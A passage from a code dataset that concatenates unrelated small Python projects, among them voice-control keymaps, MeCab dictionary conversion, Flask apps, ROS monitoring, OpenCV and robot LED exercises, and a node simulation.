list(reversed(text_right))\n\n is_word = [character in valid_characters for character in text_right]\n word_count = 1\n i = 0\n while i < (len(is_word) - 1) and not is_word[i]:\n i += 1\n\n while i < (len(is_word) - 1) and word_count < word_index:\n # print(i, is_word[i], word_count, word_index)\n if not is_word[i] and is_word[i + 1]:\n word_count += 1\n i += 1\n start_position = i\n # print(text_right[start_position:])\n while i < len(is_word) and is_word[i]:\n i += 1\n end_position = i\n\n # print(start_position, end_position, text_right[start_position:end_position])\n # cursor over to the found word\n for i in range(0, start_position):\n press(\"left\", wait=0)\n # now select the word\n for i in range(0, end_position - start_position):\n press(\"shift-left\")\n\n\ndef word_number(m):\n # lefty\n press(\"cmd-left\")\n word_neck(m)\n\n\nctx.keymap(\n {\n # meta\n \"(save it | sage)\": Key(\"cmd-s\"),\n \"(undo it | dizzle)\": Key(\"cmd-z\"),\n \"(redo it | rizzle)\": Key(\"cmd-shift-z\"),\n # clipboard\n \"(clip cut | snatch)\": Key(\"cmd-x\"),\n \"(clip copy | stoosh)\": Key(\"cmd-c\"),\n \"(clip paste | spark)\": Key(\"cmd-v\"),\n # motions\n \"(go word left | fame)\": Key(\"alt-left\"),\n \"(go word right | fish)\": Key(\"alt-right\"),\n \"(go line after end)\": Key(\"cmd-right space\"),\n \"(go line start | lefty)\": Key(\"cmd-left\"),\n \"(go line end | ricky)\": Key(\"cmd-right\"),\n \"(go line before end | smear)\": Key(\"cmd-right left\"),\n # insertions\n \"([insert] line break | sky turn)\": Key(\"shift-enter\"),\n \"([insert] new line below | slap)\": Key(\"cmd-right enter\"),\n \"([insert] new line above)\": Key(\"ctrl-a cmd-left enter up\"),\n \"([insert] duplicate line | jolt)\": Key(\n \"ctrl-a cmd-left shift-down cmd-c down cmd-v\"\n ),\n # deleting\n \"(delete around this | slurp)\": Key(\"backspace delete\"),\n \"(delete line left | snip left)\": Key(\"shift-cmd-left delete\"),\n \"(delete line right | snip right)\": Key(\"shift-cmd-right delete\"),\n \"(delete [this] line)\": Key(\"shift-cmd-right delete delete ctrl-a cmd-left\"),\n \"(delete word left | steffi | carmex)\": Key(\"alt-backspace\"),\n \"(delete word right | stippy | kite)\": Key(\"alt-delete\"),\n \"(delete [this] word | slurpies)\": Key(\"alt-backspace alt-delete\"),\n # selecting\n \"(select find right | crew) \": select_text_to_right_of_cursor,\n \"(select find left | trail) \": select_text_to_left_of_cursor,\n \"(select this word | word this)\": Key(\"alt-right shift-alt-left\"),\n \"(select this line | shackle)\": Key(\"cmd-right shift-cmd-left\"),\n \"(select above | shift home)\": Key(\"shift-home\"),\n \"(select up | shreep)\": Key(\"shift-up\"),\n \"(select down | shroom)\": Key(\"shift-down\"),\n \"(select way down | shroomway)\": Key(\"cmd-shift-down\"),\n \"(select way up | shreepway)\": Key(\"cmd-shift-up\"),\n \"(select all | olly | ali)\": Key(\"cmd-a\"),\n \"(select left | shrim | shlicky)\": Key(\"shift-left\"),\n \"(select right | shrish | shricky)\": Key(\"shift-right\"),\n \"(select word number {generic_editor.n}* above | wordpreev {generic_editor.n}*)\": word_prev,\n \"big word preev {generic_editor.n}*\": big_word_prev,\n \"big word neck {generic_editor.n}*\": big_word_neck,\n \"small word preev {generic_editor.n}*\": small_word_prev,\n \"small word neck {generic_editor.n}*\": small_word_neck,\n \"(select word number {generic_editor.n}* below | wordneck {generic_editor.n}*)\": word_neck,\n \"word {generic_editor.n}\": word_number,\n \"(select word left | scram)\": Key(\"alt-shift-left\"),\n \"(select word right | scrish)\": Key(\"alt-shift-right\"),\n \"(select line left | lecksy)\": Key(\"cmd-shift-left\"),\n \"(select line right | ricksy)\": Key(\"cmd-shift-right\"),\n }\n)\n","repo_name":"weyrick/weyrick-talon","sub_path":"community/misc/generic_editor.py","file_name":"generic_editor.py","file_ext":"py","file_size_in_byte":8247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13228043925","text":"# Exercício 1 -Crie uma estrutura que pergunte ao usuário qual o dia da semana.\n#Se o dia for igual a Domingo ou igual a sábado, imprima na tela\n#\"Hoje é dia de descanso\", caso contrário imprima na tela \"Você precisa trabalhar!\"\n\n\ndia = str(input(\"Digite o dia da semana?\")).upper()\n\nif dia == \"DOMINGO\" or dia == \"SABADO\": \n print(\"Hoje e dia de descanso!\")\n \nelse:\n print(\"Voce precisa trabalhar!\")\n \n \n \n \n","repo_name":"llorenzo-dev/Thonny","sub_path":"DSA - Python-Cap 3-Exercícios 1.py","file_name":"DSA - Python-Cap 3-Exercícios 1.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28876683142","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pygtrie\nimport argparse\nimport codecs\nimport sys\nimport os\nimport shutil\nimport subprocess\n\n\ndef get_trie_from_freqdata(freq_path):\n sys.stderr.write('Get freq...\\n')\n tr = pygtrie.CharTrie()\n with codecs.open(freq_path, 'r', 'utf-8') as inf:\n for idx, line in enumerate(inf):\n if idx % 1000 == 0:\n sys.stderr.write('\\r%d' % idx)\n items = line[:-1].split('\\t')\n if len(items) != 2:\n continue\n word = items[0]\n freq = int(items[1])\n tr[word] = freq\n sys.stderr.write('\\n done!\\n')\n return tr\n\n\ndef _make_matrix(in_path, out_path, target=0):\n sys.stderr.write('Make matrix...\\n')\n with codecs.open(in_path, 'r', 'utf-8') as inf, \\\n codecs.open(out_path, 'w', 'utf-8') as outf:\n for lid, line in enumerate(inf):\n if lid == 0:\n outf.write(line)\n continue\n elif lid % 1000 == 0:\n sys.stderr.write('\\r%d' % lid)\n\n items = line.split(' ')\n if len(items) != 3:\n raise SyntaxError\n lid, rid, cost = [int(val) for val in items]\n\n # BOS/EOS(id=0) との連接コストを一律0にする\n if lid == 0 or rid == 0:\n cost = 0\n outf.write('%d %d %d\\n' % (lid, rid, cost))\n sys.stderr.write('\\n done!\\n')\n\n\ndef _make_lex(freqs, lex_in_path, lex_out_path):\n sys.stderr.write('Make lex.csv...\\n')\n with codecs.open(lex_in_path, 'r', 'utf-8') as inf, \\\n codecs.open(lex_out_path, 'w', 'utf-8') as outf:\n for idx, line in enumerate(inf):\n surf = line[:line.find(',')]\n freq = freqs.get(surf)\n if freq is None: # 低頻度語を削る\n continue\n\n fields = line.split(',')\n if len(fields) >= 5 and fields[4] in ['記号', '補助記号', '感動詞']:\n continue\n\n outf.write(line[:-1]) # without \\n\n outf.write(\",%d\\n\" % freq) # 頻度情報を素性に足す\n\n\ndef operation(freq_path, unidic_path, out_path, command):\n out_src_path = os.path.join(out_path, 'src')\n out_bin_path = os.path.join(out_path, 'bin')\n os.makedirs(out_src_path, exist_ok=True)\n os.makedirs(out_bin_path, exist_ok=True)\n\n sys.stderr.write('Copy...\\n')\n shutil.copy(os.path.join(unidic_path, 'dicrc'), out_src_path)\n shutil.copy(os.path.join(unidic_path, 'dicrc'), out_bin_path)\n fnames = ['char.def', 'feature.def', 'left-id.def',\n 'model.def', 'rewrite.def', 'right-id.def', 'unk.def']\n for fname in fnames:\n shutil.copy(os.path.join(unidic_path, fname), out_src_path)\n\n lex_in_path = os.path.join(unidic_path, 'lex.csv')\n lex_out_path = os.path.join(out_src_path, 'lex.limited.csv')\n freqs = get_trie_from_freqdata(freq_path)\n _make_lex(freqs, lex_in_path, lex_out_path)\n\n _make_matrix(os.path.join(unidic_path, 'matrix.def'),\n os.path.join(out_src_path, 'matrix.def'))\n\n mycmd = '%s -f utf8 -t utf8 -d %s -o %s' %\\\n (command, out_src_path, out_bin_path)\n sys.stderr.write('Exec\\n %s\\n' % mycmd)\n subprocess.check_output(mycmd, shell=True)\n sys.stderr.write('\\n done!\\n')\n\n\ndef get_opts():\n oparser = argparse.ArgumentParser()\n oparser.add_argument(\"--unidic\", \"-u\", required=True)\n oparser.add_argument(\"--freq\", required=True)\n oparser.add_argument(\"--output\", \"-o\", required=True)\n oparser.add_argument(\"--command\",\n default=os.path.expanduser(\n '~/local/libexec/mecab/mecab-dict-index'))\n return oparser.parse_args()\n\n\ndef main():\n opts = get_opts()\n operation(opts.freq, opts.unidic, opts.output, opts.command)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"shirayu/MA2018-ginata","sub_path":"convert_unidic.py","file_name":"convert_unidic.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"25914422860","text":"def add_excel_template_to_file(outgoing_filename, user):\n if (outgoing_filename==\"\"):\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=str(\"Excel file not found\"),\n )\n else:\n wb_orginal = load_workbook(f'{outgoing_filename}')\n if (wb_orginal==\"\"):\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=str(\"Error in Work book Loading\"),\n )\n else:\n try:\n wb_templet=load_workbook(f'{API_CONFIG_EXCEL_FILE_PATH}/LeadZen_template.xlsx')\n index_sheet = wb_templet.get_sheet_by_name('Index')\n data = wb_orginal.get_sheet_by_name('Sheet1')\n financial_advisor = wb_templet.get_sheet_by_name('Financial Advisor')\n number_of_rows = data.max_row\n number_of_col = data.max_column\n for i in range(1, number_of_rows + 1):\n for j in range(1, number_of_col + 1):\n c = data.cell(row=i, column=j)\n financial_advisor.cell(row=i+5, column=j).value = c.value\n for rows in financial_advisor.iter_rows(min_row=6, max_row=6, min_col=1):\n for cell in rows:\n cell.fill = PatternFill(fgColor=\"B4C9D9\", patternType=\"solid\")\n no_of_record=index_sheet['J18']\n requested_by = index_sheet['J20']\n request_date = index_sheet['J22']\n no_of_record.value=number_of_rows-1\n requested_by.value=user.username\n today = date.today()\n request_date.value=today.strftime(\"%d/%m/%Y\")\n wb_templet.save(outgoing_filename)\n return outgoing_filename\n except Exception as e:\n logger.critical(\"Error>>>\" + str(e))","repo_name":"ShivPatel9211/python-scripts","sub_path":"excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31363007191","text":"#!../../anaconda2/bin/python\n\n\nimport os\n#import shutil\n#import random\n#import re\n#import json\n#import pickle\nimport reader\nimport label\n\ndir1 = \"/uufs/chpc.utah.edu/common/home/conway-group1/TRIANGULUM_ANNOTATION/AnnotationDataset/userBasedData/4-10/Adjudication/\"\ndir2 = \"/uufs/chpc.utah.edu/common/home/conway-group1/TRIANGULUM_ANNOTATION/AnnotationDataset/userBasedData/11-50/Adjudication/\"\ndir3 = \"/uufs/chpc.utah.edu/common/home/conway-group1/TRIANGULUM_ANNOTATION/AnnotationDataset/userBasedData/51-100/Adjudication/\"\ndir4 = \"/uufs/chpc.utah.edu/common/home/conway-group1/TRIANGULUM_ANNOTATION/AnnotationDataset/userBasedData/101-218/Adjudication/\"\ndir5 = \"/uufs/chpc.utah.edu/common/home/conway-group1/TRIANGULUM_ANNOTATION/AnnotationDataset/userBasedData/218-1000/Adjudication/\"\n\ndirList = [dir1,dir2,dir3,dir4,dir5]\n\nallAnotList = []\nnumFiles = 0\nnumRelationship = 0\nnumAnotFile = 0\nnumNoneFile = 0\nnumNoneRelFile = 0\nnumNoneRelFile = 0\n\nclassLabelDic = label.classLabel()\nrelList = []\nMJ = 0\nTOBACCO = 0\nVAPING = 0\nCESSATION = 0\nfileClassLabelList = []\nfor d in dirList:\n\tfor filename in os.listdir(d):\n\t\tanotDicList = reader.annotFileReader_relationship(d+filename)\n\t\tanotSet = set()\n\t\tif anotDicList:\n\t\t\tfor t in anotDicList:\n\t\t\t\tif t['relationList']:\n\t\t\t\t\tfor r in t['relationList']:\n\t\t\t\t\t\trelList.append(r['relation'])\n\n\t\t\t\tanotSet.add(t['class'])\t\t\t\t\t\n\t\tpostAnnot = []\n\t\tfor l in list(anotSet):\n\t\t\tpostAnnot = postAnnot+classLabelDic[l]\n\n\t\tfileClassLabelList.append(list(set(postAnnot)))\n\n\nimport collections\ncounter = collections.Counter(relList)\nprint(counter)\n\nfor f in fileClassLabelList:\n\tif 'MJ' in f:\n\t\tMJ = MJ+1\n\tif 'VAPING' in f:\n\t\tVAPING = VAPING+1\n\tif 'CESSATION' in f:\n\t\tCESSATION = CESSATION+1\n\tif 'TOBACCO' in f:\n\t\tTOBACCO = TOBACCO+1\n\nprint('MJ',MJ, 'VAPING', VAPING, 'CESSATION', CESSATION, 'TOBACCO',TOBACCO)\n","repo_name":"grace-mengke-hu/TRIANGULUM","sub_path":"Annotation/TagAndRelationshipCount.py","file_name":"TagAndRelationshipCount.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35973739905","text":"#Initialisation\nfrom time import sleep\nfrom NaoCommunication import *\nnao=NaoControle(Nao())\n\n# 1 - Decrire le resultat de ce morceau de code\n# ...\nfor a in range(16):\n\tif a%2==0:\n\t\tnao.reglerCouleur(a,a*15,50,50) \n\telse :\n\t\tnao.reglerCouleur(a,255,0,0)\n\tsleep(0.1)\nfor a in range(15,-1,-1):\n\tnao.eteindreLed(a)\n\tsleep(0.1)\n\n# 2 - Decrire le resultat de ce deuxieme morceau de code\n# ...\nfor a in range(15,-1,-1):\n\tnao.allumerLed(a)\n\tsleep(0.1)\nfor a in range(0,16,1):\n\tnao.eteindreLed(a)\n\tsleep(0.1)\n\n# 3 - A partir des exemples precedents, ecrire un code qui\n# allume alternativement les deux leds 1 seconde chacune\n# pendant 10 secondes.\n\n","repo_name":"AdrienVR/NaoSimulator","sub_path":"TPINFO/Partie3/exercice1.py","file_name":"exercice1.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"20910708219","text":"from flask import Flask, render_template, jsonify\nfrom database import get_jobs\n\napp = Flask(__name__)\n\n# jobs = [\n# {\n# 'id': 1,\n# 'title': 'Data Analyst',\n# 'location': 'Kuala Lumpur',\n# 'salary': 'RM4000 - 5000'\n# },\n# {\n# 'id': 2,\n# 'title': 'Software Engineer',\n# 'location': 'Penang',\n# 'salary': 'RM6000 - 8000'\n# },\n# {\n# 'id': 3,\n# 'title': 'Marketing Manager',\n# 'location': 'Johor Bahru',\n# }\n# ]\n\n\n@app.route(\"/\")\ndef home():\n jobs = get_jobs()\n return render_template(\"home.html\", jobs=jobs)\n\n\n@app.route(\"/api/jobs\")\ndef job_list():\n jobs = get_jobs()\n return jsonify(jobs)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", debug=True)\n\n","repo_name":"jianhui99/jd_job","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16176351167","text":" \nimport socket\nimport rospy\nfrom monitoring_msgs.msg import *\nfrom enum import Enum\n\nclass AggregationStrategies(Enum):\n LAST = 1\n FIRST = 2\n MIN = 3\n MAX = 4\n AVG = 5\n\nclass Monitor(object):\n def __init__(self, monitorDescription, autoPublishing=True):\n self.ma = MonitoringArray()\n self.description = monitorDescription\n self.host_name = socket.gethostname()\n self.node_name = rospy.get_name()\n self.name = self.host_name + self.node_name\n self.is_initialised = False\n self.autoPublishing = autoPublishing\n self.pub_count = 1\n self.reset_agg_dict = False\n self.aggregation_dict = {}\n self.aggregation_dict[self.name] = {}\n self.switcher = {\n AggregationStrategies.LAST: 1,\n AggregationStrategies.FIRST: 2,\n AggregationStrategies.MIN: 3,\n AggregationStrategies.MAX: 4,\n AggregationStrategies.AVG: 5,\n }\n\n\n def init_ros(self):\n self.pub = rospy.Publisher('/monitoring', MonitoringArray, queue_size=1)\n\n if self.autoPublishing:\n try:\n frequency = 1\n frequency = rospy.get_param(rospy.get_name() + '/monitoring/frequency', 1)\n if frequency == 0:\n rospy.logerr(\"frequency can not be 0, using 1\")\n frequency = 1\n duration = 1.0/frequency\n self.timer = rospy.Timer(rospy.Duration(duration), self.timercallback)\n except KeyError:\n rospy.logerr(\"monitoring frequency not set (%s/monitoring/frequency)\", rospy.get_name())\n quit()\n\n self.is_initialised = True\n\n\n def timercallback(self, event):\n self.publish()\n\n\n def agg_to_int(self, agg):\n return self.switcher.get(agg, None)\n\n\n def int_to_agg(self, ival):\n for key in self.switcher.keys():\n if ival == self.switcher[key]:\n return key\n return None\n\n\n def addValue(self, key, value, unit, errorlevel, monitor_mode=AggregationStrategies.LAST):\n # preparation \n if not self.is_initialised:\n self.init_ros()\n if self.reset_agg_dict:\n self.aggregation_dict[self.name] = {}\n self.reset_agg_dict = False\n # sanity checks\n if type(monitor_mode) == int:\n monitor_mode = self.int_to_agg(monitor_mode)\n elif type(monitor_mode) == float:\n monitor_mode = self.int_to_agg(int(monitor_mode))\n if \" \" in key:\n rospy.logwarn(\"[%s] whitespaces are not allowed in monitoring keys!\", self.node_name)\n # data aggregation\n if key in self.aggregation_dict[self.name]:\n mode = self.aggregation_dict[self.name][key]['Mode']\n if mode in (5, 4, 3) and type(value) != float:\n if type(value) != int:\n rospy.logwarn(\"With the current Aggregation Strategy for key: \"+key+\" your value has wrong type: \"+str(type(value)))\n rospy.logwarn(\"It has to be a numerical value in order to function. Doing nothing\")\n return \n if mode == 5:\n self.aggregation_dict[self.name][key]['Num'] += 1\n self.aggregation_dict[self.name][key]['Sum'] += value\n self.aggregation_dict[self.name][key]['Error'] += errorlevel\n elif mode == 4:\n if value > self.aggregation_dict[self.name][key]['Value']:\n self.aggregation_dict[self.name][key]['Value'] = value\n self.aggregation_dict[self.name][key]['Error'] = errorlevel\n elif mode == 3:\n if value < self.aggregation_dict[self.name][key]['Value']:\n self.aggregation_dict[self.name][key]['Value'] = value\n self.aggregation_dict[self.name][key]['Error'] = errorlevel\n elif mode == 1:\n self.aggregation_dict[self.name][key]['Value'] = value\n self.aggregation_dict[self.name][key]['Error'] = errorlevel\n else:\n self.aggregation_dict[self.name][key] = {'Num' : 1 , 'Value' : value, 'Sum' : value, 'Mode' : self.agg_to_int(monitor_mode), 'Unit': str(unit), 'Error': errorlevel}\n\n\n def publish(self):\n self.ma.header.stamp = rospy.Time.now()\n self.write_data()\n self.pub.publish(self.ma)\n self.resetMsg()\n self.pub_times = 1\n\n\n def write_data(self):\n mi = MonitoringInfo()\n mi.name = self.name\n mi.description = self.description\n mi.header.stamp = rospy.Time.now()\n self.ma.info.append(mi)\n for key in self.aggregation_dict[self.name].keys():\n kv = KeyValue()\n data = self.aggregation_dict[self.name][key]\n if data['Mode'] == 5:\n kv.key = str(key)\n kv.value = str(data['Sum']/(data['Num'] + 0.00001))\n kv.unit = data['Unit']\n kv.errorlevel = float(data['Error']/(data['Num']+0.0001))\n self.ma.info[0].values.append(kv)\n elif data['Mode'] == 2:\n kv.key = str(key)\n kv.value = str(data['Value'])\n kv.unit = data['Unit']\n kv.errorlevel = data['Error']\n self.ma.info[0].values.append(kv)\n elif data['Mode'] == 3:\n kv.key = str(key)\n kv.value = str(data['Value'])\n kv.unit = data['Unit']\n kv.errorlevel = data['Error']\n self.ma.info[0].values.append(kv)\n elif data['Mode'] == 4:\n kv.key = str(key)\n kv.value = str(data['Value'])\n kv.unit = data['Unit']\n kv.errorlevel = data['Error']\n self.ma.info[0].values.append(kv)\n elif data['Mode'] == 1:\n kv.key = str(key)\n kv.value = str(data['Value'])\n kv.unit = data['Unit']\n kv.errorlevel = data['Error']\n self.ma.info[0].values.append(kv)\n else:\n rospy.logerr(\"Key: \"+str(key)+\" has unknown Aggregation Strategy:\" +str(data['Mode']))\n \n\n def resetMsg(self):\n self.ma = MonitoringArray()\n self.reset_agg_dict = True\n\n\n","repo_name":"rajmohan747/Robot-Diagnostics","sub_path":"monitoring/monitoring_core/scripts/monitoring_core/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":6395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38806439024","text":"from flask import Flask, render_template, url_for, request\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import precision_score, recall_score, accuracy_score, f1_score, plot_confusion_matrix, log_loss\nfrom sklearn.ensemble import VotingClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import SVC\nfrom model import final_model\nimport pickle\n\nimage_folder = os.path.join('static', 'images')\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = image_folder\n\n@app.route('/', methods=['GET', 'POST'])\ndef home():\n\n court = os.path.join(app.config['UPLOAD_FOLDER'], 'Court 1 smaller.png')\n return render_template(\"nba.html\", user_image = court)\n\n@app.route('/age', methods=['POST', 'GET'])\ndef get_more_data():\n \n court = os.path.join(app.config['UPLOAD_FOLDER'], 'Court 1 smaller.png')\n\n if request.method == 'POST':\n year_choice = request.form['year-form']\n\n return render_template(\"nba2.html\", year_choice=year_choice, user_image = court)\n\n@app.route('/teams', methods=['POST', 'GET'])\ndef get_even_more_data():\n \n court = os.path.join(app.config['UPLOAD_FOLDER'], 'Court 1 smaller.png')\n\n if request.method == 'POST':\n parameters = request.form['age-form']\n year_choice = parameters.split(\", \")[1]\n max_age = parameters.split(\", \")[0]\n\n return render_template(\"nba3.html\", year_choice=year_choice, max_age=max_age, user_image = court)\n\n@app.route('/predict', methods=['POST', 'GET'])\ndef predict():\n \n court = os.path.join(app.config['UPLOAD_FOLDER'], 'Court 1 smaller.png')\n player_circle = os.path.join(app.config['UPLOAD_FOLDER'], 'Circle.png')\n\n updated_df = os.path.join(app.config['UPLOAD_FOLDER'], 'updated_df.pickle')\n model = os.path.join(app.config['UPLOAD_FOLDER'], 'model.pickle')\n ss = os.path.join(app.config['UPLOAD_FOLDER'], 'scaler.pickle')\n\n if request.method == 'POST':\n parameters = request.form['team-form']\n year_choice = parameters.split(\", \")[2]\n max_age = parameters.split(\", \")[1]\n if max_age == \"all\":\n max_age = 50\n teams = parameters.split(\", \")[0]\n\n df = pickle.load(open(updated_df, \"rb\"))\n MODEL = pickle.load(open(model, \"rb\"))\n scaler = pickle.load(open(ss, \"rb\"))\n\n top_24 = final_model(MODEL, scaler, df, int(f'20{year_choice[-2:]}'), \\\n max_age=int(max_age), teams=teams, first_timers_only=False)\n\n return render_template(\"nba_results.html\", user_image=court, circle=player_circle, all_stars=top_24)\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"ian-livingston/projecting-NBA-All-Stars","sub_path":"Flask app/nba.py","file_name":"nba.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25078214931","text":"import os, json\nfrom metaflow.cards import MetaflowCard\n\nCOLORS = [\n '#7e1e9c',\n '#15b01a',\n '#0343df',\n '#ff81c0',\n '#653700',\n '#e50000'\n]\n\nclass UPlotTimeseriesCard(MetaflowCard):\n type = \"uplot\"\n \n def __init__(self, options={\"artifact\":\"timeseries\"}, **kwargs):\n self._attr_nm = options.get(\"artifact\", \"timeseries\")\n\n\n def _read_template(self):\n root = os.path.join(os.path.dirname(__file__), 'uplot')\n tmpl = {}\n for key, fname in [('card', 'card.html'),\n ('uplot', 'uPlot.iife.min.js'),\n ('css', 'uPlot.min.css')]: \n with open(os.path.join(root, fname)) as f:\n tmpl[key] = f.read()\n return tmpl\n\n def render(self, task):\n if self._attr_nm not in task:\n return \"Cannot find artifact '%s' in Task('%s')\" % (self._attr_nm,task.pathspec)\n\n chevron = self._get_mustache()\n tmpl = self._read_template()\n df = task[self._attr_nm].data\n data = [[ts.timestamp() for ts in df.index]]\n for col in df:\n data.append(list(df[col].values))\n config = [{}] + [\n {'show': True,\n 'stroke': COLORS[i],\n 'label': col,\n 'width': 1} for i, col in enumerate(df)]\n tmpl['data'] = json.dumps(data)\n tmpl['config'] = json.dumps(config)\n return chevron.render(tmpl['card'], tmpl)\n\nCARDS = [UPlotTimeseriesCard]","repo_name":"outerbounds/metaflow-card-uplot","sub_path":"metaflow_extensions/card_uplot/plugins/cards/uplot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41642247614","text":"from Bandeirinha import Bandeirinha\n\nclass BandeirinhaQuadrado(Bandeirinha):\n def __init__(self, px, py, ptamanho=None):\n super(BandeirinhaQuadrado, self).__init__(px, py, ptamanho)\n self.cor_quadrado = color(random(256),\n random(256),\n random(256)) \n \n def desenha(self):\n super(BandeirinhaQuadrado, self).desenha()\n fill(self.cor_quadrado)\n rect(self.x - self.tamanho / 8,\n self.y - self.tamanho / 8,\n self.tamanho / 4,\n self.tamanho / 4)\n ","repo_name":"villares/py.processing-play","sub_path":"inheritance/BandeirinhaQuadrado.py","file_name":"BandeirinhaQuadrado.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"pt","doc_type":"code","stars":23,"dataset":"github-code","pt":"52"} +{"seq_id":"71016116646","text":"# fuel consumption converter\n\ndef l100kmtompg(liters):\n lpkm = liters/100\n gpm = lpkm * 0.4248\n mpg = 1/gpm\n \n return mpg\n \ndef mpgtol100km(miles):\n gpm = 1/miles\n lpkm = gpm * 2.351\n l100km = lpkm * 100\n \n return l100km\n\nprint(l100kmtompg(3.9))\nprint(l100kmtompg(7.5))\nprint(l100kmtompg(10.))\nprint(mpgtol100km(60.3))\nprint(mpgtol100km(31.4))\nprint(mpgtol100km(23.5))\n","repo_name":"lembuss/My-Python-Codes","sub_path":"fuelcons_converter.py","file_name":"fuelcons_converter.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26557459290","text":"import cv2\nimport numpy as np \n\nxy=[]\ni=0\n\ndef rect(event,x,y,flags,param):\n\tglobal xy,i\n\tif event==cv2.EVENT_LBUTTONDOWN:\n\t\tfont=cv2.FONT_HERSHEY_SIMPLEX\n\t\tcv2.putText(img,str([x,y]),(x,y),font,0.75,(0,255,0),1,cv2.LINE_AA)\n\t\tcv2.imshow(\"image\",img)\n\t\ti=i+1\n\t\txy.append((x,y))\n\t\tif i==2:\n\t\t\ti=0\n\t\t\tcv2.rectangle(img,xy[0],xy[1],[0,0,255],5)\n\t\t\tcv2.imshow(\"image\",img)\n\t\t\txy=[]\n\t\t\t\t\t\n\t\t\n\n\nimg=cv2.imread(\"c:/users/girishhegde/iitdimg/dog2.jpg\")\ncv2.imshow(\"image\",img)\n\ncv2.setMouseCallback('image',rect)\n\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"girishdhegde/aps-2020","sub_path":"roi.py","file_name":"roi.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16785832542","text":"import random\nfrom pprint import pprint\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom tqdm import tqdm\n\nfrom pursue_central_solution.PursueCentralSolution import PursueCentralSolution\nfrom pursue_central_solution.PursueCentralSmarter import PursueCentralSmarterSolution\nfrom greedy_central_solution.GreedyCentralSolution import GreedyCentralSolution\n\nfrom decentralized_solution.DecentralizedNode import DecentralizedSolution\nfrom decentralized_solution.DecentralizedNode import DecentralizedNode\n\nfrom simulation.node import Node, Pos\nfrom simulation.node.Node import NodeType\n\nMAX_NODE_COUNT = 5\nAVERAGE_SAMPLES = 10\nUNIT_DISTANCE = 40\nVELOCITY = 5\n\n\ndef area_shoelace(points):\n area = 0\n q = points[-1]\n for p in points:\n area += (p.position.x * q.position.y) - (p.position.y * q.position.x)\n q = p\n return area / 2\n\n\ndef total_distance_from_gateway(points : list[DecentralizedNode]):\n gateway = points[0]\n dist = 0\n for x in points[1:]:\n dist += gateway.distance_to(x)\n return dist\n\ndef avg_link_length(points: list[DecentralizedNode]):\n #points is the end node list\n link_acc = 0\n for x in points:\n if x.type == NodeType.End:\n link_acc =+ traverse_distance(x, 0)\n\ndef traverse_distance(point:DecentralizedNode, in_d):\n p = point.parent\n dist = in_d + point.distance_to(p)\n if p.type == NodeType.Home:\n return dist\n else:\n return traverse_distance(p, dist)\n\ndef total_distance_calc(relay_points, nodes, unit_distance):\n dist_ratio = len(relay_points)\n dist_ratio += len(nodes)\n return unit_distance * dist_ratio\n\n\nif __name__ == \"__main__\":\n sample_size = [10,20,50]\n node_range = [5,10,15,20,25,30]\n\n for q in sample_size:\n AVERAGE_SAMPLES = q\n\n for w in node_range:\n MAX_NODE_COUNT = w\n nodes_list = []\n\n a_node = Node(Pos(0, 0))\n nodes_list.append(a_node)\n\n combined_simulator = []\n\n combined_simulator.append(DecentralizedSolution(UNIT_DISTANCE, nodes_list))\n\n nodes_list.append(DecentralizedNode(combined_simulator[3].sandbox, UNIT_DISTANCE, in_node=Node(Pos(10, 10))))\n combined_simulator[3].prepare()\n average_list = [np.zeros(len(combined_simulator))]\n\n for v in tqdm(range(MAX_NODE_COUNT)):\n value_list = []\n for _ in range(AVERAGE_SAMPLES):\n for x in nodes_list[1:]:\n x.position.velocity_add([random.randint(-VELOCITY, VELOCITY), random.randint(-VELOCITY, VELOCITY)])\n\n print_list = []\n for idx, x in enumerate(combined_simulator[:4]):\n if idx == 3:\n for _ in range(30):\n x.execute_pipeline()\n print_list.append(total_distance_calc(x.relay_list, nodes_list[1:], UNIT_DISTANCE))\n else:\n 